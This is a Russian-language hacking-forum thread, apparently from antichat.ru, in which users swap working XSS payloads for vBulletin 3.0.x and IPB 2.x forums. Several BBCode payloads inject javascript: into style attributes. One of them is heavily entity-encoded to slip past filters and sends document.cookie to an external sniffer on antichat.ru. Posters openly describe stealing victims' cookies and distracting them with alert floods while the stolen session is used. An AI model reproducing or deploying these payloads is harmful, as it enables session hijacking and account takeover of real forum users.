Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.
Прочитай статью WJ, может она тебе поможет )))))))))))))))))))) http://forum.antichat.ru/thread11807.html
2 Him@s, неа Просто выводит вот такой текст: [FONT=Arial size=20 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); / ]wj" target="_blank">http://www.]wj А http://www.] стает линком на http://www.]/ и все
ты его проверял? У меня вот что в сообщение пишет: wj" target="_blank">http://www.][FONT=Arial style=d...41; / ]wj http://www.] - является ссылкой на http://www.]/ ((((( ЗЫ.. + перед документ.кукис не убрал.. знаю что там он нуже.. и пишет то что я выше написал.
у меня на локалхосте, я там пробую... могу дать ссылку на дистрибутив http://vbulletin.net.ru Вот здесь скачай 3.0.8
vBulletin 3.0.3: HTML: [ EMAIL=[ URL= as=`[email protected]]mailto:[email protected] ] sssssssssssssssssssssssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))` (без пробела после квадратной скобки)
Там много квадратных скобок.. убрал после первой, перед Email, и после второй, перед Url, но всеравно не работает
mailto:[email protected] ] sssssssssssssssssssssssssss[/URL]` style=`background:url(javascript:alert(/Hi_from_Algol/))` Вот так выводит и все
Кстати еще должен быть пассивыный XSS в теме письма: Code: Тема ПМ<script>alert()</script> Если они это не пофиксили еще...
Это потому что Алгол дал тебе для версии 3.0.3 После версии 3.0.6, фильтры очень сильно изменились. HTML: [URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/url][/FONT][/URL] В атрибутах style, в параметрах, (То что идет после знака равенства) убери плюсики (+). Эту строку не трогай. А вообще пора бы этот код сделать чтобы работал для всех браузеров. Я как приду, напишу тебе чтобы работало не только в ИЕ, но и в Опере и в Фаерфокс.
Отлично... просто класс, все действительно работает! Очень благодарен, спасибо большое!!! Если можешь - напиши чтобы работало и в остальных браузерах, буду ждать! Еще раз огромное спасибо!
Сделай так, чтобы работало не только в ИЕ, но и в Опера и Фаерфокс. Но так как в ФФ есть авто-защита, то напиши вот так: Этот код с паливой, но будет работать и в Фаефокс. Потому что код с паливой, пришлось жертве дать бесчисленное количество алертов. Куки придут на античатовский сниффер, а пока жертва опомнится, у тебя есть несколько секунд делать то, что ты хочешь. В зависимости от знаний твоей жертвы. Все параметры тоже закодируй.
Кстати, тем кому надо чтобы можно было воровать куки в Фаерфоксе на форумах IPB от 2.* до 2.1.3, то вот вам код: Параметры тут тоже закодируйте. В версии 2.1.4 теги пост и топик уже пропаченны из-за того, что один человечек на меня настукал компании Инвизион, но как всегда, есть и другие теги, так что не беда.
